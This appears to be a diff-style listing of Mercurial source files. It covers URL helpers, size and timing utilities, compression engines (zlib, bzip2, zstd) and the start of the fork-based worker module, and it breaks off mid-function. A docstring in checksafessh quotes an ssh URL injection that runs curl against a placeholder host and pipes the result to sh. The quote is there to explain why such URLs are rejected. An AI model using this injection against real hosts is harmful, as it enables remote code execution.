        return self._hostport + '/' + self.path
    if (self.host is not None and self.path
        and not hasdriveletter(path)):
        return '/' + path
    return path
2997 2997
def islocal(self):
    '''whether localpath will return something that posixfile can open'''
    scheme = self.scheme
    # no scheme at all counts as local, as do file: and bundle:
    return not scheme or scheme in ('file', 'bundle')
3002 3002
def hasscheme(path):
    '''Return True if parsing ``path`` as a url yields a non-empty scheme.'''
    parsed = url(path)
    return bool(parsed.scheme)
3005 3005
def hasdriveletter(path):
    '''Return True if ``path`` starts with a drive letter such as ``c:``.

    The first character must be alphabetic and the second a colon.
    Empty or ``None`` input yields ``False`` (a real bool, rather than
    the falsy input itself).
    '''
    return bool(path) and path[1:2] == ':' and path[0:1].isalpha()
3008 3008
def urllocalpath(path):
    '''Return the local path for ``path``, parsed without splitting off
    a query string or fragment.'''
    parsed = url(path, parsequery=False, parsefragment=False)
    return parsed.localpath()
3011 3011
def checksafessh(path):
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    ssh parses the first item of the url as an option when it starts
    with a dash, e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Such urls are rejected outright, and the check is done on the
    unquoted form so percent-encoding cannot hide the dash.

    Raises an error.Abort when the url is unsafe.
    """
    decoded = urlreq.unquote(path)
    if decoded.startswith(('ssh://-', 'svn+ssh://-')):
        raise error.Abort(_('potentially unsafe url: %r') %
                          (decoded,))
3026 3026
def hidepassword(u):
    '''hide user credential in a url string

    A password, when present, is replaced with ``***``; the url is
    otherwise re-rendered as parsed.
    '''
    parsed = url(u)
    if parsed.passwd:
        parsed.passwd = '***'
    return bytes(parsed)
3033 3033
def removeauth(u):
    '''remove all authentication information from a url string

    Both user and password are dropped. The result is rendered with
    ``bytes()``, matching ``hidepassword()``, so that the return type
    does not turn into a unicode string on Python 3.
    '''
    parsed = url(u)
    parsed.user = parsed.passwd = None
    return bytes(parsed)
3039 3039
3040 3040 timecount = unitcountfn(
3041 3041 (1, 1e3, _('%.0f s')),
3042 3042 (100, 1, _('%.1f s')),
3043 3043 (10, 1, _('%.2f s')),
3044 3044 (1, 1, _('%.3f s')),
3045 3045 (100, 0.001, _('%.1f ms')),
3046 3046 (10, 0.001, _('%.2f ms')),
3047 3047 (1, 0.001, _('%.3f ms')),
3048 3048 (100, 0.000001, _('%.1f us')),
3049 3049 (10, 0.000001, _('%.2f us')),
3050 3050 (1, 0.000001, _('%.3f us')),
3051 3051 (100, 0.000000001, _('%.1f ns')),
3052 3052 (10, 0.000000001, _('%.2f ns')),
3053 3053 (1, 0.000000001, _('%.3f ns')),
3054 3054 )
3055 3055
3056 3056 _timenesting = [0]
3057 3057
def timed(func):
    '''Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

        @util.timed
        def foo(a, b, c):
            pass

    Reports from nested timed calls are indented by the nesting depth.
    '''
    step = 2

    def wrapper(*args, **kwargs):
        begin = timer()
        _timenesting[0] += step
        try:
            return func(*args, **kwargs)
        finally:
            # measured and reported even when func raises
            elapsed = timer() - begin
            _timenesting[0] -= step
            stderr.write('%s%s: %s\n' %
                         (' ' * _timenesting[0], func.__name__,
                          timecount(elapsed)))
    return wrapper
3082 3082
# Suffix/multiplier pairs, tried in this order against the end of the
# lowercased size specifier.
_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
              ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))

def sizetoint(s):
    '''Convert a space specifier to a byte count.

    >>> sizetoint(b'30')
    30
    >>> sizetoint(b'2.2kb')
    2252
    >>> sizetoint(b'6M')
    6291456
    '''
    spec = s.strip().lower()
    try:
        for suffix, multiplier in _sizeunits:
            if spec.endswith(suffix):
                number = spec[:len(spec) - len(suffix)]
                return int(float(number) * multiplier)
        # no recognized unit: a plain integer byte count
        return int(spec)
    except ValueError:
        raise error.ParseError(_("couldn't parse size: %s") % s)
3104 3104
class hooks(object):
    '''A collection of hook functions that can be used to extend a
    function's behavior. Hooks are called in lexicographic order,
    based on the names of their sources.'''

    def __init__(self):
        # list of (source, hook) pairs, sorted lazily on each call
        self._hooks = []

    def add(self, source, hook):
        '''Register ``hook`` under the name ``source``.'''
        self._hooks.append((source, hook))

    def __call__(self, *args):
        '''Call every hook with ``args`` and return the list of results.'''
        self._hooks.sort(key=lambda entry: entry[0])
        return [hook(*args) for _source, hook in self._hooks]
3122 3122
def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
    '''Yields lines for a nicely formatted stacktrace.

    The innermost 'skip' entries (plus this function's own frame) are
    dropped, then only the last 'depth' remaining entries are kept; a
    depth of 0 keeps them all.
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields:
      length of longest filepath+line number,
      filepath+linenumber,
      function

    Not be used in production code but very convenient while developing.
    '''
    stack = traceback.extract_stack()[:-skip - 1]
    entries = []
    for fn, ln, func, _text in stack:
        entries.append((fileline % (fn, ln), func))
    entries = entries[-depth:]
    if not entries:
        return

    # width of the widest location, used to align the output columns
    fnmax = max(len(location) for location, _func in entries)
    for fnln, func in entries:
        if line is None:
            yield (fnmax, fnln, func)
        else:
            yield line % (fnmax, fnln, func)
3145 3145
def debugstacktrace(msg='stacktrace', skip=0,
                    f=stderr, otherf=stdout, depth=0):
    '''Writes a message to f (stderr) with a nicely formatted stacktrace.
    Skips the 'skip' entries closest to the call, then show 'depth' entries.
    By default it will flush stdout first.
    It can be used everywhere and intentionally does not require an ui object.
    Not be used in production code but very convenient while developing.
    '''
    if otherf:
        otherf.flush()
    header = '%s at:\n' % msg.rstrip()
    f.write(header)
    # skip + 1 so that this function's own frame is left out as well
    frames = getstackframes(skip + 1, depth=depth)
    for frameline in frames:
        f.write(frameline)
    f.flush()
3160 3160
class dirs(object):
    '''a multiset of directory names from a dirstate or manifest'''

    def __init__(self, map, skip=None):
        # directory name -> reference count
        self._dirs = {}
        add = self.addpath
        if skip is not None and safehasattr(map, 'iteritems'):
            # leave out entries whose first state element equals 'skip'
            for fname, state in map.iteritems():
                if state[0] != skip:
                    add(fname)
        else:
            for fname in map:
                add(fname)

    def addpath(self, path):
        '''Count one more reference to the ancestor directories of path.'''
        counts = self._dirs
        for base in finddirs(path):
            if base in counts:
                # ancestors of an already known directory are not touched
                counts[base] += 1
                return
            counts[base] = 1

    def delpath(self, path):
        '''Drop one reference to the ancestor directories of path.'''
        counts = self._dirs
        for base in finddirs(path):
            if counts[base] > 1:
                counts[base] -= 1
                return
            del counts[base]

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs
3196 3196
3197 3197 if safehasattr(parsers, 'dirs'):
3198 3198 dirs = parsers.dirs
3199 3199
def finddirs(path):
    '''Yield each ancestor directory of path, deepest first.

    Every prefix of path that ends just before a '/' is produced; a
    path without '/' yields nothing.
    '''
    cut = path.rfind('/')
    while cut >= 0:
        yield path[:cut]
        cut = path.rfind('/', 0, cut)
3205 3205
3206 3206 # compression code
3207 3207
3208 3208 SERVERROLE = 'server'
3209 3209 CLIENTROLE = 'client'
3210 3210
3211 3211 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3212 3212 (u'name', u'serverpriority',
3213 3213 u'clientpriority'))
3214 3214
class compressormanager(object):
    """Holds registrations of various compression engines.

    This class essentially abstracts the differences between compression
    engines to allow new compression formats to be added easily, possibly from
    extensions.

    Compressors are registered against the global instance by calling its
    ``register()`` method.
    """
    def __init__(self):
        # Engine name to engine instance.
        self._engines = {}
        # Bundle spec human name to engine name.
        self._bundlenames = {}
        # Internal bundle identifier to engine name.
        self._bundletypes = {}
        # Revlog header to engine name.
        self._revlogheaders = {}
        # Wire proto identifier to engine name.
        self._wiretypes = {}

    def __getitem__(self, key):
        return self._engines[key]

    def __contains__(self, key):
        return key in self._engines

    def __iter__(self):
        return iter(self._engines.keys())

    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.

        Aborts if the engine's name, bundle name, bundle type, wire
        protocol identifier or revlog header is already registered.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()
        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        bundleinfo = engine.bundletype()
        if bundleinfo:
            bundlename, bundletype = bundleinfo

            if bundlename in self._bundlenames:
                raise error.Abort(_('bundle name %s already registered') %
                                  bundlename)
            if bundletype in self._bundletypes:
                raise error.Abort(_('bundle type %s already registered by %s') %
                                  (bundletype, self._bundletypes[bundletype]))

            # A false bundlename means no external facing name is declared.
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

            self._wiretypes[wiretype] = name

        revlogheader = engine.revlogheader()
        if revlogheader:
            if revlogheader in self._revlogheaders:
                raise error.Abort(_('revlog header %s already registered by %s') %
                                  (revlogheader,
                                   self._revlogheaders[revlogheader]))
            self._revlogheaders[revlogheader] = name

        self._engines[name] = engine

    @property
    def supportedbundlenames(self):
        return set(self._bundlenames)

    @property
    def supportedbundletypes(self):
        return set(self._bundletypes)

    def _loadable(self, enginename):
        """Return the engine registered as ``enginename``.

        Aborts if the engine reports itself as not available.
        """
        engine = self._engines[enginename]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle name isn't registered.

        Will abort if the engine is known but not available.
        """
        return self._loadable(self._bundlenames[bundlename])

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        return self._loadable(self._bundletypes[bundletype])

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        if role == SERVERROLE:
            attr = 'serverpriority'
        else:
            attr = 'clientpriority'

        candidates = [self._engines[n] for n in self._wiretypes.values()]
        if onlyavailable:
            candidates = [e for e in candidates if e.available()]

        def sortkey(engine):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            support = engine.wireprotosupport()
            return -1 * getattr(support, attr), support.name

        return sorted(candidates, key=sortkey)

    def forwiretype(self, wiretype):
        """Obtain a compression engine registered to a wire proto identifier.

        Will raise KeyError if the identifier isn't registered.

        Will abort if the engine is known but not available.
        """
        return self._loadable(self._wiretypes[wiretype])

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]
3368 3368
3369 3369 compengines = compressormanager()
3370 3370
class compressionengine(object):
    """Base class for compression engines.

    Compression engines must implement the interface defined by this class.
    """
    def name(self):
        """Returns the name of the compression engine.

        This is the key the engine is registered under.

        This method must be implemented.
        """
        raise NotImplementedError()

    def available(self):
        """Whether the compression engine is available.

        The intent of this method is to allow optional compression engines
        that may not be available in all installations (such as engines relying
        on C extensions that may not be present).

        The base implementation always reports the engine as available.
        """
        return True

    def bundletype(self):
        """Describes bundle identifiers for this engine.

        If this compression engine isn't supported for bundles, returns None.

        If this engine can be used for bundles, returns a 2-tuple of strings of
        the user-facing "bundle spec" compression name and an internal
        identifier used to denote the compression format within bundles. To
        exclude the name from external usage, set the first element to ``None``.

        If bundle compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.

        The docstring of this method is used in the help system to tell users
        about this engine.
        """
        return None

    def wireprotosupport(self):
        """Declare support for this compression format on the wire protocol.

        If this compression engine isn't supported for compressing wire
        protocol payloads, returns None.

        Otherwise, returns ``compenginewireprotosupport`` with the following
        fields:

        * String format identifier
        * Integer priority for the server
        * Integer priority for the client

        The integer priorities are used to order the advertisement of format
        support by server and client. The highest integer is advertised
        first. Integers with non-positive values aren't advertised.

        The priority values are somewhat arbitrary and only used for default
        ordering. The relative order can be changed via config options.

        If wire protocol compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        If this engine can be used to compress revlogs, this method should
        return the bytes used to identify chunks compressed with this engine.
        Else, the method should return ``None`` to indicate it does not
        participate in revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        The method receives an iterator (ideally a generator) of chunks of
        bytes to be compressed. It returns an iterator (ideally a generator)
        of bytes of chunks representing the compressed output.

        Optionally accepts an argument defining how to perform compression.
        Each engine treats this argument differently.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        Argument is an object with a ``read(size)`` method that returns
        compressed data. Return value is an object with a ``read(size)`` that
        returns uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The object has a ``compress(data)`` method that compresses binary
        data. This method returns compressed binary data or ``None`` if
        the data could not be compressed (too small, not compressible, etc).
        The returned data should have a header uniquely identifying this
        compression format so decompression can be routed to this engine.
        This header should be identified by the ``revlogheader()`` return
        value.

        The object has a ``decompress(data)`` method that decompresses
        data. The method will only be called if ``data`` begins with
        ``revlogheader()``. The method should return the raw, uncompressed
        data or raise a ``RevlogError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()
3487 3487
class _zlibengine(compressionengine):
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and size.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        return 'x'

    def compressstream(self, it, opts=None):
        """Yield zlib-compressed data for the chunks in ``it``.

        ``opts`` may carry a ``level`` key; -1 is used otherwise.
        """
        opts = opts or {}

        compressor = zlib.compressobj(opts.get('level', -1))
        for chunk in it:
            out = compressor.compress(chunk)
            # Not all calls to compress emit data. It is cheaper to inspect
            # here than to feed empty chunks through generator.
            if out:
                yield out

        yield compressor.flush()

    def decompressorreader(self, fh):
        """Return a chunkbuffer over the decompressed content of ``fh``."""
        def gen():
            decompressor = zlib.decompressobj()
            for chunk in filechunkiter(fh):
                while chunk:
                    # Limit output size to limit memory.
                    yield decompressor.decompress(chunk, 2 ** 18)
                    chunk = decompressor.unconsumed_tail

        return chunkbuffer(gen())

    class zlibrevlogcompressor(object):
        def compress(self, data):
            """Return ``data`` zlib-compressed, or None.

            None is returned for inputs shorter than 44 bytes and
            whenever the compressed form is not smaller than the input.
            """
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 44:
                return None

            if insize <= 1000000:
                compressed = zlib.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            compressor = zlib.compressobj()
            parts = []
            for start in range(0, insize, 2**20):
                parts.append(compressor.compress(data[start:start + 2**20]))
            parts.append(compressor.flush())

            if sum(map(len, parts)) < insize:
                return ''.join(parts)
            return None

        def decompress(self, data):
            """Return ``data`` decompressed; zlib errors become RevlogError."""
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        str(e))

    def revlogcompressor(self, opts=None):
        return self.zlibrevlogcompressor()
3572 3572
3573 3573 compengines.register(_zlibengine())
3574 3574
class _bz2engine(compressionengine):
    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    # We declare a protocol name but don't advertise by default because
    # it is slow.
    def wireprotosupport(self):
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        """Yield bzip2-compressed data for the chunks in ``it``.

        ``opts`` may carry a ``level`` key; 9 is used otherwise.
        """
        opts = opts or {}
        compressor = bz2.BZ2Compressor(opts.get('level', 9))
        for chunk in it:
            out = compressor.compress(chunk)
            # skip the calls that did not emit anything
            if out:
                yield out

        yield compressor.flush()

    def decompressorreader(self, fh):
        """Return a chunkbuffer over the decompressed content of ``fh``."""
        def gen():
            decompressor = bz2.BZ2Decompressor()
            for chunk in filechunkiter(fh):
                yield decompressor.decompress(chunk)

        return chunkbuffer(gen())
3615 3615
3616 3616 compengines.register(_bz2engine())
3617 3617
class _truncatedbz2engine(compressionengine):
    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        # no user-facing bundle spec name, only an internal identifier
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled elsewhere.

    def decompressorreader(self, fh):
        def gen():
            decompressor = bz2.BZ2Decompressor()
            # The input stream doesn't have the 'BZ' header. So add it back.
            decompressor.decompress('BZ')
            for chunk in filechunkiter(fh):
                yield decompressor.decompress(chunk)

        return chunkbuffer(gen())
3636 3636
3637 3637 compengines.register(_truncatedbz2engine())
3638 3638
class _noopengine(compressionengine):
    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't because
    # unless you are on a fast network, uncompressed payloads can easily
    # saturate your network pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # We don't implement revlogheader because it is handled specially
    # in the revlog class.

    def compressstream(self, it, opts=None):
        # nothing to do: hand the input chunks back untouched
        return it

    def decompressorreader(self, fh):
        # nothing to do: the file object already yields the payload
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            # always report the data as not compressed
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()
3671 3671
3672 3672 compengines.register(_noopengine())
3673 3673
class _zstdengine(compressionengine):
    def name(self):
        return 'zstd'

    @propertycache
    def _module(self):
        # Not all installs have the zstd module available. So defer importing
        # until first access.
        try:
            from . import zstd
            # Force delayed import.
            zstd.__version__
            return zstd
        except ImportError:
            return None

    def available(self):
        return bool(self._module)

    def bundletype(self):
        """A modern compression algorithm that is fast and highly flexible.

        Only supported by Mercurial 4.1 and newer clients.

        With the default settings, zstd compression is both faster and yields
        better compression than ``gzip``. It also frequently yields better
        compression than ``bzip2`` while operating at much higher speeds.

        If this engine is available and backwards compatibility is not a
        concern, it is likely the best available engine.
        """
        return 'zstd', 'ZS'

    def wireprotosupport(self):
        return compewireprotosupport('zstd', 50, 50)

    def revlogheader(self):
        return '\x28'

    def compressstream(self, it, opts=None):
        """Yield zstd-compressed data for the chunks in ``it``.

        ``opts`` may carry a ``level`` key; 3 is used otherwise.
        """
        opts = opts or {}
        # zstd level 3 is almost always significantly faster than zlib
        # while providing no worse compression. It strikes a good balance
        # between speed and compression.
        level = opts.get('level', 3)

        zstd = self._module
        compressor = zstd.ZstdCompressor(level=level).compressobj()
        for chunk in it:
            out = compressor.compress(chunk)
            if out:
                yield out

        yield compressor.flush()

    def decompressorreader(self, fh):
        """Return a chunkbuffer over the decompressed content of ``fh``."""
        zstd = self._module
        dctx = zstd.ZstdDecompressor()
        return chunkbuffer(dctx.read_from(fh))

    class zstdrevlogcompressor(object):
        def __init__(self, zstd, level=3):
            # Writing the content size adds a few bytes to the output. However,
            # it allows decompression to be more optimal since we can
            # pre-allocate a buffer to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level,
                                             write_content_size=True)
            self._dctx = zstd.ZstdDecompressor()
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            """Return ``data`` zstd-compressed, or None.

            None is returned for inputs shorter than 50 bytes and
            whenever the compressed form is not smaller than the input.
            """
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 50:
                return None

            if insize <= 1000000:
                compressed = self._cctx.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None

            # larger inputs are fed to a streaming compressor piecewise
            compressor = self._cctx.compressobj()
            chunks = []
            start = 0
            while start < insize:
                end = start + self._compinsize
                piece = compressor.compress(data[start:end])
                if piece:
                    chunks.append(piece)
                start = end
            chunks.append(compressor.flush())

            if sum(map(len, chunks)) < insize:
                return ''.join(chunks)
            return None

        def decompress(self, data):
            """Return ``data`` decompressed; any failure becomes RevlogError."""
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                dobj = self._dctx.decompressobj()
                chunks = []
                start = 0
                while start < insize:
                    end = start + self._decompinsize
                    piece = dobj.decompress(data[start:end])
                    if piece:
                        chunks.append(piece)
                    start = end
                # Frame should be exhausted, so no finish() API.

                return ''.join(chunks)
            except Exception as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        str(e))

    def revlogcompressor(self, opts=None):
        opts = opts or {}
        level = opts.get('level', 3)
        return self.zstdrevlogcompressor(self._module, level=level)
3800 3800
3801 3801 compengines.register(_zstdengine())
3802 3802
def bundlecompressiontopics():
    """Obtains a list of available bundle compressions for use in help."""
    # We need to format the docstring. So use a dummy object/type to hold it
    # rather than mutating the original.
    class docobject(object):
        pass

    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
    items = {}

    for name in compengines:
        engine = compengines[name]

        if not engine.available():
            continue

        bundleinfo = engine.bundletype()
        # only engines that declare a user-facing bundle name are listed
        if not (bundleinfo and bundleinfo[0]):
            continue
        bundlename = bundleinfo[0]
        origdoc = engine.bundletype.__doc__

        value = docobject()
        value.__doc__ = pycompat.sysstr('``%s``\n %s') % (
            bundlename, origdoc)
        value._origdoc = origdoc
        value._origfunc = engine.bundletype

        items[bundlename] = value

    return items
3834 3834
3835 3835 i18nfunctions = bundlecompressiontopics().values()
3836 3836
3837 3837 # convenient shortcut
3838 3838 dst = debugstacktrace
3839 3839
def safename(f, tag, ctx, others=None):
    """
    Generate a name that it is safe to rename f to in the given context.

    f:      filename to rename
    tag:    a string tag that will be included in the new name
    ctx:    a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in

    Returns a file name of the form oldname~tag[~number] which does not exist
    in the provided context and is not in the set of other names.
    """
    if others is None:
        others = set()

    plain = '%s~%s' % (f, tag)
    if plain not in ctx and plain not in others:
        return plain

    # fall back to numbered variants, starting at 1, until one is free
    numbered = ('%s~%s~%s' % (f, tag, n) for n in itertools.count(1))
    return next(fn for fn in numbered
                if fn not in ctx and fn not in others)
@@ -1,240 +1,240 b''
1 1 # worker.py - master-slave parallelism support
2 2 #
3 3 # Copyright 2013 Facebook, Inc.
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 8 from __future__ import absolute_import
9 9
10 10 import errno
11 11 import os
12 12 import signal
13 13 import sys
14 14
15 15 from .i18n import _
16 16 from . import (
17 17 encoding,
18 18 error,
19 19 pycompat,
20 20 scmutil,
21 21 util,
22 22 )
23 23
def countcpus():
    '''try to count the number of CPUs on the system

    Two probes are attempted in order, and the first one that yields a
    positive integer wins:

    1. os.sysconf('SC_NPROCESSORS_ONLN') (posix)
    2. the NUMBER_OF_PROCESSORS environment variable (windows)

    returns 1 if neither probe produces a usable value
    '''

    # posix
    try:
        n = int(os.sysconf(r'SC_NPROCESSORS_ONLN'))
        if n > 0:
            return n
    except (AttributeError, ValueError, OSError):
        # AttributeError: os.sysconf does not exist on this platform
        # ValueError: the configuration name is not known here
        # OSError: the name is known but unsupported by the host system
        pass

    # windows
    try:
        n = int(encoding.environ['NUMBER_OF_PROCESSORS'])
        if n > 0:
            return n
    except (KeyError, ValueError):
        # variable missing or not an integer: fall through to the default
        pass

    return 1
44 44
def _numworkers(ui):
    '''return how many worker processes should be used

    A ``worker.numcpus`` setting that parses to an integer >= 1 is
    returned as-is. When the setting is unset, empty or smaller than 1,
    the detected CPU count is used instead, clamped to the range 4..32.

    raises error.Abort if ``worker.numcpus`` is set but is not an integer
    '''
    configured = ui.config('worker', 'numcpus')
    if configured:
        try:
            requested = int(configured)
        except ValueError:
            raise error.Abort(_('number of cpus must be an integer'))
        if requested >= 1:
            return requested
    detected = countcpus()
    return min(max(detected, 4), 32)
55 55
# Cost charged by worthwhile() for starting each worker process. On
# non-posix platforms the value is so large that worthwhile() can never
# compute a positive benefit, which keeps all work in the calling process.
_startupcost = 0.01 if pycompat.isposix else 1e30
60 60
def worthwhile(ui, costperop, nops):
    '''report whether spreading the work over several worker processes
    is expected to pay for the cost of starting them

    costperop - estimated cost of a single operation

    nops - number of operations to perform

    The serial cost (costperop * nops) is compared with the parallel
    cost (startup cost of every worker plus an even share of the serial
    cost); the answer is True when the saving is at least 0.15.
    '''
    serialcost = costperop * nops
    nworkers = _numworkers(ui)
    parallelcost = _startupcost * nworkers + serialcost / nworkers
    return serialcost - parallelcost >= 0.15
68 68
def worker(ui, costperarg, func, staticargs, args):
    '''call func over args, fanning out to several worker processes
    when worthwhile() judges that to be a win

    returns a progress iterator

    costperarg - cost of a single task

    func - function to run

    staticargs - tuple of arguments passed unchanged to every
    invocation of func

    args - arguments to split into chunks, one chunk per worker; each
    chunk is appended to staticargs as the final argument of func
    '''
    if not worthwhile(ui, costperarg, len(args)):
        # too little work to pay for extra processes: run func in-process
        return func(*staticargs + (args,))
    return _platformworker(ui, func, staticargs, args)
87 87
def _posixworker(ui, func, staticargs, args):
    '''fork-based implementation of worker()

    args is split with partition() into one slice per worker and one
    child process is forked per slice. Each child iterates over
    func(*(staticargs + (slice,))) and writes every (i, item) pair it
    produces as a "<i> <item>\\n" line to a pipe shared by all children.
    The parent reads the pipe line by line and yields (int, str) pairs.

    This is a generator: nothing is forked until iteration starts.

    When a child ends with a non-zero status the remaining children are
    sent SIGTERM and, once the pipe is drained, cleanup() terminates the
    parent with the same status (re-raising the signal if the child was
    killed by one).
    '''
    rfd, wfd = os.pipe()
    workers = _numworkers(ui)
    # ignore SIGINT in the parent while workers run; the previous handler is
    # put back in each child right after fork and in the parent by cleanup()
    oldhandler = signal.getsignal(signal.SIGINT)
    signal.signal(signal.SIGINT, signal.SIG_IGN)
    # pids: children not yet reaped
    # problem: one-element list so the nested functions below can update the
    # first non-zero child status in place
    pids, problem = set(), [0]
    def killworkers():
        # unregister SIGCHLD handler as all children will be killed. This
        # function shouldn't be interrupted by another SIGCHLD; otherwise pids
        # could be updated while iterating, which would cause inconsistency.
        signal.signal(signal.SIGCHLD, oldchldhandler)
        # if one worker bails, there's no good reason to wait for the rest
        for p in pids:
            try:
                os.kill(p, signal.SIGTERM)
            except OSError as err:
                # ESRCH: the process is already gone, which is fine
                if err.errno != errno.ESRCH:
                    raise
    def waitforworkers(blocking=True):
        # reap children; with blocking=False only those that already exited
        for pid in pids.copy():
            p = st = 0
            while True:
                try:
                    p, st = os.waitpid(pid, (0 if blocking else os.WNOHANG))
                    break
                except OSError as e:
                    if e.errno == errno.EINTR:
                        # interrupted by a signal: retry the wait
                        continue
                    elif e.errno == errno.ECHILD:
                        # child would already be reaped, but pids yet been
                        # updated (maybe interrupted just after waitpid)
                        pids.discard(pid)
                        break
                    else:
                        raise
            if not p:
                # skip subsequent steps, because child process should
                # be still running in this case
                continue
            pids.discard(p)
            st = _exitstatus(st)
            # remember only the first failure
            if st and not problem[0]:
                problem[0] = st
    def sigchldhandler(signum, frame):
        # a child changed state: reap without blocking and, if any child
        # failed, terminate the others
        waitforworkers(blocking=False)
        if problem[0]:
            killworkers()
    oldchldhandler = signal.signal(signal.SIGCHLD, sigchldhandler)
    # flush ui before forking
    # NOTE(review): presumably so buffered output is not duplicated into the
    # children -- confirm
    ui.flush()
    parentpid = os.getpid()
    for pargs in partition(args, workers):
        # make sure we use os._exit in all worker code paths. otherwise the
        # worker may do some clean-ups which could cause surprises like
        # deadlock. see sshpeer.cleanup for example.
        # override error handling *before* fork. this is necessary because
        # exception (signal) may arrive after fork, before "pid =" assignment
        # completes, and other exception handler (dispatch.py) can lead to
        # unexpected code path without os._exit.
        # -1 & 255 == 255: exit status of a child whose workerfunc did not
        # complete through scmutil.callcatch
        ret = -1
        try:
            pid = os.fork()
            if pid == 0:
                # child: restore the signal handlers the parent had on entry
                signal.signal(signal.SIGINT, oldhandler)
                signal.signal(signal.SIGCHLD, oldchldhandler)

                def workerfunc():
                    # the child only writes to the pipe
                    os.close(rfd)
                    for i, item in func(*(staticargs + (pargs,))):
                        os.write(wfd, '%d %s\n' % (i, item))
                    return 0

                ret = scmutil.callcatch(ui, workerfunc)
        except: # parent re-raises, child never returns
            if os.getpid() == parentpid:
                raise
            exctype = sys.exc_info()[0]
            # force a traceback for everything except KeyboardInterrupt
            force = not issubclass(exctype, KeyboardInterrupt)
            ui.traceback(force=force)
        finally:
            if os.getpid() != parentpid:
                # child: always leave through os._exit, whatever happened
                try:
                    ui.flush()
                except: # never returns, no re-raises
                    pass
                finally:
                    os._exit(ret & 255)
        pids.add(pid)
    # parent: drop the write end and read from the pipe unbuffered
    # NOTE(review): presumably closing wfd is what lets the read loop below
    # see EOF once every child has exited -- confirm
    os.close(wfd)
    # NOTE(review): fp is not explicitly closed anywhere in this function
    fp = os.fdopen(rfd, pycompat.sysstr('rb'), 0)
    def cleanup():
        # restore SIGINT, reap every remaining child, restore SIGCHLD, then
        # propagate the first failure (if any) to the caller's process
        signal.signal(signal.SIGINT, oldhandler)
        waitforworkers()
